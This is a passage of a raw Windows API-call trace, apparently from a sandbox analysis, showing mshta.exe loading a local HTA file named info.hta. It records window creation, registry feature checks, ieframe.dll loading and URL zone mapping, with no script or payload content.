pBuffer=0x1ef320, cbSize=0xc8, pwzMimeProposed="text/html", dwMimeFlags=0x6, ppwzMimeOut=0x1ef2d8, dwReserved=0x0 | out: ppwzMimeOut=0x1ef2d8*="text/html") returned 0x0 [0223.859] CoTaskMemFree (pv=0x5d33f0) [0223.859] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/info.hta", pSecMgr=0x0) returned 0x1 [0223.859] StrCmpNIW (lpStr1="text/h", lpStr2="image/", nChar=6) returned 1 [0223.860] GetCurrentThreadId () returned 0x36c [0223.860] SetEvent (hEvent=0x1b4) returned 1 [0223.860] IUnknown:Release (This=0x5bbbac) returned 0x12 [0223.860] IUnknown:Release (This=0x5bc0bc) returned 0x1 [0223.860] IUnknown:Release (This=0x5a0570) returned 0x3 [0223.860] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.860] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.860] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.860] IUnknown:Release (This=0x5bbbac) returned 0x11 [0223.860] IUnknown:Release (This=0x5bbbac) returned 0x10 [0223.860] IUnknown:Release (This=0x5bbbac) returned 0xf [0223.860] IUnknown:Release (This=0x5a0570) returned 0x2 [0223.860] IUnknown:Release (This=0x5bbbac) returned 0xe [0223.860] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.860] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.860] CoTaskMemFree (pv=0x5d0488) [0223.860] CoTaskMemFree (pv=0x0) [0223.860] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.860] IUnknown:Release (This=0x5bbbac) returned 0xd [0223.860] CoTaskMemFree (pv=0x5d0458) [0223.860] GetClientRect (in: hWnd=0x20160, lpRect=0x1ef8cc | out: lpRect=0x1ef8cc) returned 1 [0223.861] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x78) returned 0x5a1a80 [0223.861] GetClientRect (in: hWnd=0x20160, lpRect=0x5a1aac | out: lpRect=0x5a1aac) returned 1 [0223.861] OffsetRect (in: lprc=0x5a1aac, dx=0, dy=0 | out: lprc=0x5a1aac) returned 1 [0223.861] OffsetRect (in: lprc=0x5a1abc, dx=0, dy=0 | out: lprc=0x5a1abc) returned 1 [0223.861] RegisterClassExW (param_1=0x1ef3e8) returned 0xc153 [0223.861] CoCreateInstance (in: rclsid=0x7408bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x7408bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7447b020 | out: ppv=0x7447b020*=0x5d2410) returned 0x0 [0224.443] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x5d2410, aaClassList=0x1ef4e0*=0xc153, uSize=0x1) returned 0x0 [0224.443] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc153, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x20160, hMenu=0x0, hInstance=0x73f40000, lpParam=0x5c1650) returned 0x3016a [0224.443] GetWindowLongW (hWnd=0x3016a, nIndex=-20) returned 0 [0224.443] SetWindowLongW (hWnd=0x3016a, nIndex=-21, dwNewLong=6035024) returned 0 [0224.443] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x81, wParam=0x0, lParam=0x1ef0b4*=6035024, plResult=0x1eef2c | out: plResult=0x1eef2c) returned 0x1 [0224.443] NtdllDefWindowProc_W () returned 0x1 [0224.443] GetCurrentThreadId () returned 0x36c [0224.444] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0224.444] GetCurrentThreadId () returned 0x36c [0224.444] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0224.444] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x1, wParam=0x0, lParam=0x1ef0b4*=6035024, plResult=0x1eef2c | out: plResult=0x1eef2c) returned 0x1 [0224.444] NtdllDefWindowProc_W () returned 0x0 [0224.444] GetCurrentThreadId () returned 0x36c [0224.444] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0224.444] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x1eef78 | out: plResult=0x1eef78) returned 0x1 [0224.444] NtdllDefWindowProc_W () returned 0x0 [0224.444] GetCurrentThreadId () returned 0x36c [0224.444] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0224.444] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x1eef78 | out: plResult=0x1eef78) returned 0x1 [0224.444] NtdllDefWindowProc_W () returned 0x0 [0224.444] GetCurrentThreadId () returned 0x36c [0224.444] NtdllDefWindowProc_W () returned 0x0 [0224.444] GetClassNameW (in: hWnd=0x20160, lpClassName=0x1ef4e8, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0224.444] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0224.444] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x5d2410, fRestoreLayout=1) returned 0x0 [0224.444] SendMessageW (hWnd=0x3016a, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0224.444] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0224.444] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x1ef39c | out: plResult=0x1ef39c) returned 0x1 [0224.444] NtdllDefWindowProc_W () returned 0x3 [0224.444] GetCurrentThreadId () returned 0x36c [0224.444] IntersectRect (in: lprcDst=0x1ef71c, lprcSrc1=0x5a1aac, lprcSrc2=0x5a1abc | out: lprcDst=0x1ef71c) returned 1 [0224.444] EqualRect (lprc1=0x1ef71c, lprc2=0x5a1aac) returned 1 [0224.444] InvalidateRect (hWnd=0x3016a, lpRect=0x0, bErase=1) returned 1 [0224.444] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xf0) returned 0x5d32d0 [0224.445] IntersectRect (in: lprcDst=0x1ef608, lprcSrc1=0x1ef608, lprcSrc2=0x1ef5a0 | out: lprcDst=0x1ef608) returned 1 [0224.445] IntersectRect (in: lprcDst=0x1ef608, lprcSrc1=0x1ef608, lprcSrc2=0x1ef5a0 | out: lprcDst=0x1ef608) returned 1 [0224.445] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x60) returned 0x5d7ee0 [0224.445] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x30) returned 0x5ad9a0 [0224.510] IntersectRect (in: lprcDst=0x1ef444, lprcSrc1=0x1ef444, lprcSrc2=0x1ef414 | out: lprcDst=0x1ef444) returned 1 [0224.510] IntersectRect (in: lprcDst=0x5d7df8, lprcSrc1=0x5d7df8, lprcSrc2=0x1ef434 | out: lprcDst=0x5d7df8) returned 1 [0224.510] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0224.510] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28) returned 0x5d0488 [0224.510] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d0488 | out: hHeap=0x590000) returned 1 [0224.510] SetWindowPos (hWnd=0x3016a, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0224.510] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0224.510] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x46, wParam=0x0, lParam=0x1ef6fc*=196970, plResult=0x1ef598 | out: plResult=0x1ef598) returned 0x1 [0224.510] NtdllDefWindowProc_W () returned 0x0 [0224.510] GetCurrentThreadId () returned 0x36c [0224.511] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0224.511] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x47, wParam=0x0, lParam=0x1ef6fc*=196970, plResult=0x1ef594 | out: plResult=0x1ef594) returned 0x1 [0224.511] NtdllDefWindowProc_W () returned 0x0 [0224.511] GetCurrentThreadId () returned 0x36c [0224.511] SetTimer (hWnd=0x3016a, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0224.511] GetFocus () returned 0x0 [0224.511] EnumChildWindows (hWndParent=0x3016a, lpEnumFunc=0x74260a73, lParam=0x1ef5f4) returned 0 [0224.519] GetFocus () returned 0x0 [0224.519] SetFocus (hWnd=0x3016a) returned 0x0 [0224.519] NtdllDefWindowProc_W () returned 0x0 [0224.519] NtdllDefWindowProc_W () returned 0x0 [0225.526] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x1eefbc | out: plResult=0x1eefbc) returned 0x0 [0225.528] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0225.528] GetKeyState (nVirtKey=1) returned 0 [0225.528] GetKeyState (nVirtKey=2) returned 0 [0225.528] GetKeyState (nVirtKey=16) returned 0 [0225.528] GetKeyState (nVirtKey=17) returned 0 [0225.528] GetKeyState (nVirtKey=4) returned 0 [0225.528] GetKeyState (nVirtKey=18) returned 0 [0225.528] GetMessageTime () returned 0 [0225.528] GetMessagePos () returned 0x0 [0225.528] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x1ee9ec | out: plResult=0x1ee9ec) returned 0x0 [0225.528] GetCurrentThreadId () returned 0x36c [0225.528] GetCurrentThreadId () returned 0x36c [0225.528] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0225.609] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5e0860 | out: hHeap=0x590000) returned 1 [0225.609] GetCurrentThreadId () returned 0x36c [0225.609] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d83a0 | out: hHeap=0x590000) returned 1 [0225.609] GetCurrentThreadId () returned 0x36c [0225.609] GetCurrentThreadId () returned 0x36c [0225.609] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x1ef3ac | out: plResult=0x1ef3ac) returned 0x1 [0225.609] NtdllDefWindowProc_W () returned 0x0 [0225.609] GetCurrentThreadId () returned 0x36c [0225.609] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x5d2410, hWnd=0x3016a, phIMC=0x1ef6d4 | out: phIMC=0x1ef6d4*=0x9009f) returned 0x0 [0225.609] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x5d2410, hWnd=0x3016a, hIME=0x0, phPrev=0x1ef6d4 | out: phPrev=0x1ef6d4*=0x9009f) returned 0x0 [0225.609] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x60) returned 0x5e1ac8 [0225.609] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5e1ac8 | out: hHeap=0x590000) returned 1 [0225.609] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x60) returned 0x5e1ac8 [0225.610] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5e1ac8 | out: hHeap=0x590000) returned 1 [0225.610] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d09f8 | out: hHeap=0x590000) returned 1 [0225.610] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d09c8 | out: hHeap=0x590000) returned 1 [0225.610] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0225.610] GetKeyState (nVirtKey=1) returned 0 [0225.610] GetKeyState (nVirtKey=2) returned 0 [0225.610] GetKeyState (nVirtKey=16) returned 0 [0225.610] GetKeyState (nVirtKey=17) returned 0 [0225.610] GetKeyState (nVirtKey=4) returned 0 [0225.610] GetKeyState (nVirtKey=18) returned 0 [0225.610] GetMessageTime () returned 0 [0225.610] GetMessagePos () returned 0x0 [0225.610] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x1ef3bc | out: plResult=0x1ef3bc) returned 0x0 [0225.610] GetCurrentThreadId () returned 0x36c [0225.610] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0225.610] GetKeyState (nVirtKey=1) returned 0 [0225.610] GetKeyState (nVirtKey=2) returned 0 [0225.610] GetKeyState (nVirtKey=16) returned 0 [0225.610] GetKeyState (nVirtKey=17) returned 0 [0225.610] GetKeyState (nVirtKey=4) returned 0 [0225.610] GetKeyState (nVirtKey=18) returned 0 [0225.610] GetMessageTime () returned 0 [0225.610] GetMessagePos () returned 0x0 [0225.611] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x5d2410, hWnd=0x3016a, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x1ef3bc | out: plResult=0x1ef3bc) returned 0x0 [0225.611] GetCurrentThreadId () returned 0x36c [0225.611] IsOS (dwOS=0x25) returned 1 [0225.611] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef5c8 | out: phkResult=0x1ef5c8*=0x214) returned 0x0 [0225.611] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef5cc | out: phkResult=0x1ef5cc*=0x218) returned 0x0 [0225.611] RegOpenKeyExW (in: hKey=0x218, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef588 | out: phkResult=0x1ef588*=0x0) returned 0x2 [0225.611] RegOpenKeyExW (in: hKey=0x214, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef588 | out: phkResult=0x1ef588*=0x21c) returned 0x0 [0225.611] SHRegGetValueW () returned 0x0 [0225.611] RegCloseKey (hKey=0x21c) returned 0x0 [0225.611] RegCloseKey (hKey=0x0) returned 0x6 [0225.611] RegCloseKey (hKey=0x0) returned 0x6 [0225.611] RegCloseKey (hKey=0x214) returned 0x0 [0225.611] RegCloseKey (hKey=0x218) returned 0x0 [0225.611] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x71da0000 [0225.864] GetVersionExW (in: lpVersionInformation=0x1ef0d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ef0d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.864] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x71da0000 [0225.864] LoadStringW (in: hInstance=0x71da0000, uID=0xb5, lpBuffer=0x1ef650, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0225.865] LoadStringW (in: hInstance=0x71da0000, uID=0xb5, lpBuffer=0x1ef6b0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0225.865] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28) returned 0x5d09f8 [0225.865] LoadStringW (in: hInstance=0x71da0000, uID=0xb5, lpBuffer=0x1ef69c, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0225.866] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x1ee084 | out: ppURI=0x1ee084*=0x5bbf0c) returned 0x0 [0225.866] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ee05c | out: ppvObject=0x1ee05c*=0x5bbf0c) returned 0x0 [0225.866] IUnknown:Release (This=0x5bbf0c) returned 0x4 [0225.866] IUnknown:AddRef (This=0x5bbf0c) returned 0x5 [0225.866] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28) returned 0x5d0a28 [0225.866] IUnknown:Release (This=0x5bbf0c) returned 0x4 [0225.866] IUnknown:Release (This=0x5bbf0c) returned 0x3 [0225.866] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x100) returned 0x603d70 [0225.866] FindResourceW (hModule=0x71da0000, lpName=0x1fe, lpType=0x6) returned 0x2e684d0 [0225.866] LoadResource (hModule=0x71da0000, hResInfo=0x2e684d0) returned 0x2e8e53c [0225.866] LockResource (hResData=0x2e8e53c) returned 0x2e8e53c [0225.866] VirtualQuery (in: lpAddress=0x2e8e53c, lpBuffer=0x1ef22c, dwLength=0x1c | out: lpBuffer=0x1ef22c*(BaseAddress=0x2e8e000, AllocationBase=0x2bb0000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.866] SizeofResource (hModule=0x71da0000, hResInfo=0x2e684d0) returned 0xe6 [0225.866] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d0a28 | out: hHeap=0x590000) returned 1 [0225.866] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x603d70, Size=0x46) returned 0x603d70 [0225.867] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4a) returned 0x5ce310 [0225.867] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc) returned 0x5bda58 [0225.867] RegisterDragDrop (hwnd=0x3016a, pDropTarget=0x744796cc) returned 0x0 [0225.867] GetCurrentThreadId () returned 0x36c [0225.867] GetCurrentThreadId () returned 0x36c [0225.867] GetCurrentThreadId () returned 0x36c [0225.867] GetCurrentThreadId () returned 0x36c [0225.867] GetMessageW (in: lpMsg=0x1ef90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x1ef90c) returned 1 [0225.867] TranslateMessage (lpMsg=0x1ef90c) returned 0 [0225.867] DispatchMessageW (lpMsg=0x1ef90c) returned 0x0 [0225.868] GetMessageW (in: lpMsg=0x1ef90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x1ef90c) returned 1 [0225.868] TranslateMessage (lpMsg=0x1ef90c) returned 0 [0225.868] DispatchMessageW (lpMsg=0x1ef90c) returned 0x0 [0225.868] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0225.868] KillTimer (hWnd=0x3016a, uIDEvent=0x1000) returned 1 [0225.914] IUnknown:AddRef (This=0x5bbf0c) returned 0x4 [0225.914] IUri:GetScheme (in: This=0x5bbf0c, pdwScheme=0x1eec44 | out: pdwScheme=0x1eec44*=0x9) returned 0x0 [0225.914] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1eec24 | out: ppvObject=0x1eec24*=0x5bbf0c) returned 0x0 [0225.914] IUnknown:Release (This=0x5bbf0c) returned 0x4 [0225.914] IUnknown:AddRef (This=0x5bbf0c) returned 0x5 [0225.914] PathCreateFromUrlW (in: pszUrl="file:///C:/info.hta", pszPath=0x1eec78, pcchPath=0x1eec58, dwFlags=0x0 | out: pszPath="C:\\info.hta", pcchPath=0x1eec58) returned 0x0 [0225.914] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x6042a8 [0225.914] IUnknown:Release (This=0x5bbf0c) returned 0x4 [0225.914] GetWindowTextW (in: hWnd=0x20160, lpString=0x1ee7f0, nMaxCount=512 | out: lpString="") returned 0 [0225.914] NtdllDefWindowProc_W () returned 0x0 [0225.914] SetWindowTextW (hWnd=0x20160, lpString="C:\\info.hta") returned 1 [0225.914] NtdllDefWindowProc_W () returned 0x1 [0225.919] IUnknown:Release (This=0x5bbf0c) returned 0x3 [0225.919] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x6042a8 | out: hHeap=0x590000) returned 1 [0225.919] GetCurrentThreadId () returned 0x36c [0225.919] GetMessageW (in: lpMsg=0x1ef90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x1ef90c) returned 1 [0225.919] TranslateMessage (lpMsg=0x1ef90c) returned 0 [0225.919] DispatchMessageW (lpMsg=0x1ef90c) [0225.933] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ef3e8 | out: ppu=0x1ef3e8) returned 0x0 [0225.933] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0225.933] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0225.933] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0225.933] StrCmpNICW (lpStr1="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0225.934] StrStrIW (lpFirst="", lpSrch="http://www.w3.org/TR/REC-html40/strict.dtd") returned 0x0 [0225.934] StrStrIW (lpFirst="", lpSrch="DTD XHTML") returned 0x0 [0225.934] StrStrIW (lpFirst="", lpSrch="DTD HTML 4") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0225.934] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0225.934] StrStrIW (lpFirst="", lpSrch="DTD XHTML 1.0") returned 0x0 [0225.934] StrStrIW (lpFirst="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0225.934] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0225.934] StrStrIW (lpFirst="", lpSrch=" Transitional//") returned 0x0 [0225.934] StrStrIW (lpFirst="", lpSrch=" Frameset//") returned 0x0 [0225.934] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5eaa38 | out: hHeap=0x590000) returned 1 [0225.934] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x34) returned 0x5cf6c0 [0225.934] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5ce3c0 [0225.934] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5fd640 [0225.934] GetTickCount () returned 0x20666 [0225.938] SetTimer (hWnd=0x3016a, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0225.938] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0225.938] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5ce418 [0225.938] IUnknown:AddRef (This=0x5bbf0c) returned 0x4 [0225.938] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pdwZone=0x1ef3d4, dwFlags=0x0 | out: pdwZone=0x1ef3d4*=0xffffffff) returned 0x800c0011 [0225.938] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0225.938] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0225.938] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0225.938] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", dwAction=0x2106, pPolicy=0x1ef3d8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x1ef3d8*=0x0) returned 0x0 [0225.938] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0225.938] IUnknown:Release (This=0x5bbf0c) returned 0x3 [0225.938] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fd640 | out: hHeap=0x590000) returned 1 [0225.938] GetTickCount () returned 0x20666 [0225.963] GetTickCount () returned 0x20685 [0226.162] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x603e30 | out: hHeap=0x590000) returned 1 [0226.165] GetSystemDefaultLCID () returned 0x409 [0226.165] GetVersionExW (in: lpVersionInformation=0x1ef378*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x290073, dwMinorVersion=0x0, dwBuildNumber=0x590000, dwPlatformId=0x4000, szCSDVersion="\x3e28\x60\xf480\x1e\x389e\x76f4\x138\x59\x387a\x76f4\x2e9b\x771e") | out: lpVersionInformation=0x1ef378*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.165] GetKeyboardLayoutList (in: nBuff=32, lpList=0x1ef2f8 | out: lpList=0x1ef2f8) returned 1 [0226.165] GetSystemMetrics (nIndex=4096) returned 0 [0226.165] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0226.165] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b1 [0226.165] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b4 [0226.165] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0226.165] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0226.165] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0226.165] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07a [0226.165] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0226.165] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2c) returned 0x5d83a0 [0226.424] CBaseMoniker::AddRef () returned 0x2 [0226.424] IUnknown:AddRef (This=0x5a0570) returned 0x3 [0226.424] IsAsyncMoniker (pmk=0x5a0570) returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Write () returned 0x0 [0226.424] CMemStm::Release () returned 0x1 [0226.424] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.424] IUnknown:Release (This=0x5a0570) returned 0x2 [0226.425] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.425] CMemStm::Seek () returned 0x0 [0226.425] GetFocus () returned 0x3016a [0226.425] GetCursorPos (in: lpPoint=0x1ef538 | out: lpPoint=0x1ef538*(x=449, y=50)) returned 1 [0226.425] ScreenToClient (in: hWnd=0x3016a, lpPoint=0x1ef538 | out: lpPoint=0x1ef538) returned 1 [0226.425] GetClientRect (in: hWnd=0x3016a, lpRect=0x1ef528 | out: lpRect=0x1ef528) returned 1 